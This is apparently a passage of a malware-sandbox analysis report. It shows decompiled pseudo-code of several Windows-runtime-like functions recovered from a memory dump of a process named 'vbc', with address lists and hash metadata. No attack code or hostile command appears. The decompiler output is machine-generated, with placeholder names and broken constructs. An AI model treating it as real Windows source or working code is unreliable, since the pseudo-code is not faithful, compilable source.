									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E015CEB70(0, 0x16a79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1152c65
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E015EF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E015CEEF0(0x16a79a0);
									__eflags =  *0x16a8210 - _t104; // 0x1152c58
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x16a8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01634888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E015CEB70(_t95, 0x16a79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E015F95D0();
											L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E015F95D0();
											L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E015CEB70(_t93, 0x16a79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E015F95D0();
										L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E015F95D0();
										L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E015EF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                  0x015b52a5
                                                  0x015b52ad
                                                  0x015b52b0
                                                  0x015b52b3
                                                  0x015b52b7
                                                  0x015b52ba
                                                  0x015b52bf
                                                  0x015b52c4
                                                  0x015b52cc
                                                  0x00000000
                                                  0x00000000
                                                  0x015b52ce
                                                  0x015b52d9
                                                  0x015b52dd
                                                  0x015b52e7
                                                  0x015b52f7
                                                  0x015b52f9
                                                  0x015b52fd
                                                  0x01610dcf
                                                  0x01610dd5
                                                  0x01610dd6
                                                  0x01610dd7
                                                  0x01610dd8
                                                  0x01610dd9
                                                  0x01610dde
                                                  0x01610ddf
                                                  0x01610de0
                                                  0x01610de1
                                                  0x01610de2
                                                  0x01610de5
                                                  0x01610dea
                                                  0x01610dec
                                                  0x01610f60
                                                  0x01610f64
                                                  0x01610f70
                                                  0x01610f76
                                                  0x01610f79
                                                  0x01610f79
                                                  0x00000000
                                                  0x01610f64
                                                  0x01610df2
                                                  0x01610df7
                                                  0x01610e04
                                                  0x01610e0d
                                                  0x01610e0d
                                                  0x01610e10
                                                  0x01610e1a
                                                  0x01610e1c
                                                  0x01610e4c
                                                  0x01610e52
                                                  0x01610e61
                                                  0x01610e67
                                                  0x01610e6b
                                                  0x01610e70
                                                  0x01610e76
                                                  0x01610ed7
                                                  0x01610edc
                                                  0x01610ee0
                                                  0x01610ee6
                                                  0x01610eea
                                                  0x01610eed
                                                  0x01610ef0
                                                  0x01610ef3
                                                  0x01610ef6
                                                  0x01610ef9
                                                  0x01610efe
                                                  0x01610f01
                                                  0x01610f01
                                                  0x01610f0b
                                                  0x01610f12
                                                  0x01610f16
                                                  0x01610f18
                                                  0x01610f1b
                                                  0x01610f2c
                                                  0x01610f31
                                                  0x01610f31
                                                  0x01610f35
                                                  0x01610f39
                                                  0x01610f3a
                                                  0x01610f3c
                                                  0x01610f3f
                                                  0x01610f50
                                                  0x01610f55
                                                  0x01610f55
                                                  0x01610f59
                                                  0x015b52eb
                                                  0x015b52f1
                                                  0x015b52f1
                                                  0x01610e7d
                                                  0x01610e84
                                                  0x01610e88
                                                  0x01610e8a
                                                  0x01610e8d
                                                  0x01610e9e
                                                  0x01610ea3
                                                  0x01610ea3
                                                  0x01610ea7
                                                  0x01610eaf
                                                  0x01610eb3
                                                  0x01610eb9
                                                  0x01610eb9
                                                  0x01610ebc
                                                  0x01610ecd
                                                  0x01610ecd
                                                  0x00000000
                                                  0x01610eb3
                                                  0x01610e21
                                                  0x01610e2b
                                                  0x01610e2f
                                                  0x01610e30
                                                  0x01610e3a
                                                  0x01610e3f
                                                  0x01610e41
                                                  0x00000000
                                                  0x00000000
                                                  0x01610e47
                                                  0x00000000
                                                  0x01610e47
                                                  0x01610df9
                                                  0x01610dfe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01610dfe
                                                  0x015b5303
                                                  0x015b5307
                                                  0x00000000
                                                  0x015b5309
                                                  0x00000000
                                                  0x015b5309
                                                  0x015b5307
                                                  0x015b52e9
                                                  0x015b52e9
                                                  0x00000000
                                                  0x015b52e9
                                                  0x015b530e
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f43ebabb0213de0a129404c68fd24fbe0f2765ee93b0c382358ba7da770efdd0
                                                  • Instruction ID: a8079b6147fbd7fed455d0803557db280f76b8517b27f779cbe3f43e5aa93066
                                                  • Opcode Fuzzy Hash: f43ebabb0213de0a129404c68fd24fbe0f2765ee93b0c382358ba7da770efdd0
                                                  • Instruction Fuzzy Hash: 0751B831205742AFD7219F68CC81B6ABBE4FF94B14F14092EF5958B651E770E844CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E2AE4 Relevance: .2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015E2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x16a8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x16a8208; // 0x16a8207
				_t8 = _t57 + 0x16a8208; // 0x16a8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x16a8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x16a821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x16a6d5c; // 0x7fbb0654
							_t72 =  *0x16a6d5c; // 0x7fbb0654
							_t75 =  *0x16a6d5c; // 0x7fbb0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x16a6d5c; // 0x7fbb0654
							_t84 =  *0x16a6d5c; // 0x7fbb0654
							_t87 =  *0x16a6d5c; // 0x7fbb0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E015FF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                  0x015e2ae4
                                                  0x015e2aec
                                                  0x015e2aef
                                                  0x015e2af4
                                                  0x015e2af7
                                                  0x015e2afd
                                                  0x015e2b92
                                                  0x015e2b92
                                                  0x015e2b97
                                                  0x015e2b9c
                                                  0x015e2b9c
                                                  0x015e2b03
                                                  0x015e2b06
                                                  0x015e2b09
                                                  0x015e2b09
                                                  0x015e2b0f
                                                  0x015e2b15
                                                  0x015e2b15
                                                  0x015e2b1b
                                                  0x015e2b1e
                                                  0x015e2b21
                                                  0x015e2b26
                                                  0x015e2b29
                                                  0x015e2b81
                                                  0x015e2b84
                                                  0x015e2c0e
                                                  0x015e2c15
                                                  0x015e2c24
                                                  0x015e2c24
                                                  0x015e2b8a
                                                  0x015e2b8a
                                                  0x015e2b8a
                                                  0x015e2b8a
                                                  0x015e2b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2b4a
                                                  0x015e2b4a
                                                  0x015e2b4d
                                                  0x015e2b53
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2b55
                                                  0x015e2b58
                                                  0x015e2bb7
                                                  0x01625d1b
                                                  0x01625d37
                                                  0x01625d47
                                                  0x01625d53
                                                  0x015e2bbd
                                                  0x015e2bbd
                                                  0x015e2bbd
                                                  0x015e2bb7
                                                  0x015e2b5d
                                                  0x015e2c2f
                                                  0x01625d5b
                                                  0x01625d77
                                                  0x01625d87
                                                  0x01625d93
                                                  0x015e2c35
                                                  0x015e2c35
                                                  0x015e2c35
                                                  0x015e2c2f
                                                  0x015e2b65
                                                  0x015e2b9f
                                                  0x015e2ba2
                                                  0x015e2b67
                                                  0x015e2b67
                                                  0x015e2b69
                                                  0x015e2b6b
                                                  0x015e2b6e
                                                  0x015e2bc9
                                                  0x015e2bcc
                                                  0x015e2bcf
                                                  0x015e2bd4
                                                  0x015e2bd6
                                                  0x015e2bd6
                                                  0x015e2bdb
                                                  0x015e2c02
                                                  0x015e2c05
                                                  0x015e2c07
                                                  0x00000000
                                                  0x015e2c07
                                                  0x015e2be0
                                                  0x015e2c00
                                                  0x015e2c3f
                                                  0x015e2c3f
                                                  0x00000000
                                                  0x015e2c00
                                                  0x015e2be5
                                                  0x015e2be7
                                                  0x015e2bec
                                                  0x015e2bf4
                                                  0x015e2bf6
                                                  0x00000000
                                                  0x015e2bf6
                                                  0x015e2b70
                                                  0x015e2b76
                                                  0x015e2b2b
                                                  0x015e2b2b
                                                  0x015e2b2d
                                                  0x015e2b2f
                                                  0x015e2b32
                                                  0x015e2b35
                                                  0x015e2b3a
                                                  0x00000000
                                                  0x015e2b40
                                                  0x015e2b43
                                                  0x015e2b45
                                                  0x015e2b47
                                                  0x015e2b4a
                                                  0x015e2b4d
                                                  0x015e2b53
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2b53
                                                  0x015e2b78
                                                  0x015e2b78
                                                  0x015e2b7b
                                                  0x015e2b7e
                                                  0x00000000
                                                  0x015e2b7e
                                                  0x015e2b76
                                                  0x015e2ba5
                                                  0x015e2ba5
                                                  0x015e2ba8
                                                  0x015e2bad
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2baf
                                                  0x015e2baf
                                                  0x015e2bc2
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e048125615bcee5ee9c2d55b483f7b1e6d3d5677972730fe3158458d3156528b
                                                  • Instruction ID: 84f52318382739b7f49009c2e6f393864a0915969579dd8816e3cf9ec819c0b9
                                                  • Opcode Fuzzy Hash: e048125615bcee5ee9c2d55b483f7b1e6d3d5677972730fe3158458d3156528b
                                                  • Instruction Fuzzy Hash: 9651A176E001258FCB18DF1CC8949BDB7F9FB88700B1A885AE8469F359D730AA51CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0167AE44 Relevance: .2, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E0167AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0167C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0167ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0167FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0167EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E015D7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01671608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01681536(0x16a8ae4, (_t74 -  *0x16a8b04 >> 0x14) + (_t74 -  *0x16a8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0167C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0167A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0165CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0167ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                  0x0167ae44
                                                  0x0167ae4c
                                                  0x0167ae53
                                                  0x0167ae55
                                                  0x0167ae5c
                                                  0x0167ae64
                                                  0x0167ae68
                                                  0x0167ae75
                                                  0x0167ae75
                                                  0x0167ae78
                                                  0x0167ae7a
                                                  0x0167ae7c
                                                  0x0167ae7f
                                                  0x0167aea8
                                                  0x0167aeab
                                                  0x0167aead
                                                  0x00000000
                                                  0x00000000
                                                  0x0167aeb3
                                                  0x0167aeb8
                                                  0x0167aebb
                                                  0x0167aebd
                                                  0x00000000
                                                  0x0167ae81
                                                  0x0167ae88
                                                  0x0167ae8f
                                                  0x0167ae9b
                                                  0x0167ae96
                                                  0x0167ae96
                                                  0x0167ae96
                                                  0x0167aea0
                                                  0x0167aea3
                                                  0x0167aebf
                                                  0x0167aebf
                                                  0x0167aec3
                                                  0x0167aec9
                                                  0x0167af0d
                                                  0x0167af14
                                                  0x0167af3d
                                                  0x0167af3d
                                                  0x0167af41
                                                  0x0167af44
                                                  0x0167af67
                                                  0x0167af67
                                                  0x0167af6a
                                                  0x0167afca
                                                  0x0167afd1
                                                  0x00000000
                                                  0x0167afd1
                                                  0x0167af6c
                                                  0x0167af6d
                                                  0x0167af75
                                                  0x0167af7c
                                                  0x0167af7e
                                                  0x0167af80
                                                  0x0167af85
                                                  0x0167af87
                                                  0x0167af99
                                                  0x0167af89
                                                  0x0167af92
                                                  0x0167af92
                                                  0x0167af9e
                                                  0x0167afa1
                                                  0x0167afa3
                                                  0x0167afa9
                                                  0x0167afb0
                                                  0x0167afb2
                                                  0x0167afb4
                                                  0x0167afbc
                                                  0x0167afbc
                                                  0x0167afb4
                                                  0x0167afb0
                                                  0x00000000
                                                  0x0167afa1
                                                  0x0167af4f
                                                  0x0167af57
                                                  0x0167af5c
                                                  0x0167af5e
                                                  0x00000000
                                                  0x00000000
                                                  0x0167af60
                                                  0x0167af64
                                                  0x0167af64
                                                  0x00000000
                                                  0x0167af64
                                                  0x0167af1a
                                                  0x0167af25
                                                  0x00000000
                                                  0x00000000
                                                  0x0167af27
                                                  0x0167af28
                                                  0x0167af33
                                                  0x00000000
                                                  0x0167aed0
                                                  0x0167aed0
                                                  0x0167aed2
                                                  0x0167aee1
                                                  0x0167aee4
                                                  0x00000000
                                                  0x00000000
                                                  0x0167aee6
                                                  0x0167aeec
                                                  0x00000000
                                                  0x00000000
                                                  0x0167aefb
                                                  0x0167af07
                                                  0x0167afd3
                                                  0x0167afdb
                                                  0x0167afdb
                                                  0x00000000
                                                  0x0167af07
                                                  0x0167aed6
                                                  0x0167aed8
                                                  0x0167aedf
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0167aedf
                                                  0x0167aec9

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 22b123dff9e2c1d548e389bcebb010b4ff6a32830bb4e9220b33d693426107bf
                                                  • Instruction ID: e0d95e322072ce05e74a79c1cf075f95973a1c4279080856260073cc90971339
                                                  • Opcode Fuzzy Hash: 22b123dff9e2c1d548e389bcebb010b4ff6a32830bb4e9220b33d693426107bf
                                                  • Instruction Fuzzy Hash: 4241E4B17012119BD72ADAADCC94B3FBB9AAF84620F1C461DF956873D0DB38D802D691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DDBE9 Relevance: .1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E015DDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E015BCC50(E015B4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E015D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01688ED6(_t102, _t98);
						}
						_t76 = _v44;
						E015D2280(_t58, _v44);
						E015DDD82(_v44, _t102, _t98);
						E015DB944(_t102, _v5);
						return E015CFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x16a8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x16a862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x16a8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x16a862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x167fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                  0x015ddbe9
                                                  0x015ddbf2
                                                  0x015ddbf7
                                                  0x015ddbf9
                                                  0x015ddbfc
                                                  0x015ddc00
                                                  0x015ddc03
                                                  0x015ddc14
                                                  0x015ddd54
                                                  0x015ddd54
                                                  0x015ddd54
                                                  0x015ddc18
                                                  0x015ddc1d
                                                  0x015ddc1d
                                                  0x015ddc32
                                                  0x015ddc3b
                                                  0x015ddc3e
                                                  0x015ddc46
                                                  0x015ddd5b
                                                  0x015ddd62
                                                  0x015ddd64
                                                  0x015ddd67
                                                  0x015ddd69
                                                  0x015ddd6b
                                                  0x015ddd6e
                                                  0x015ddd70
                                                  0x015ddd73
                                                  0x015ddd73
                                                  0x00000000
                                                  0x015ddc4c
                                                  0x015ddc4e
                                                  0x01623ae3
                                                  0x01623ae8
                                                  0x01623aea
                                                  0x015ddce7
                                                  0x015ddce9
                                                  0x015ddcec
                                                  0x015ddcee
                                                  0x015ddcf0
                                                  0x015ddcf3
                                                  0x015ddcf5
                                                  0x01623af2
                                                  0x01623af5
                                                  0x01623af5
                                                  0x015ddd06
                                                  0x015ddd08
                                                  0x015ddd0b
                                                  0x015ddd12
                                                  0x01623b08
                                                  0x015ddd18
                                                  0x015ddd18
                                                  0x015ddd18
                                                  0x015ddd20
                                                  0x015ddd23
                                                  0x01623b16
                                                  0x01623b16
                                                  0x015ddd29
                                                  0x015ddd2d
                                                  0x015ddd36
                                                  0x015ddd40
                                                  0x015ddd51
                                                  0x015ddd51
                                                  0x015ddc54
                                                  0x015ddc59
                                                  0x015ddc59
                                                  0x015ddc5e
                                                  0x015ddc5e
                                                  0x015ddc63
                                                  0x015ddc66
                                                  0x015ddc6b
                                                  0x015ddc78
                                                  0x015ddc7b
                                                  0x015ddc81
                                                  0x015ddc81
                                                  0x015ddc83
                                                  0x015ddc89
                                                  0x00000000
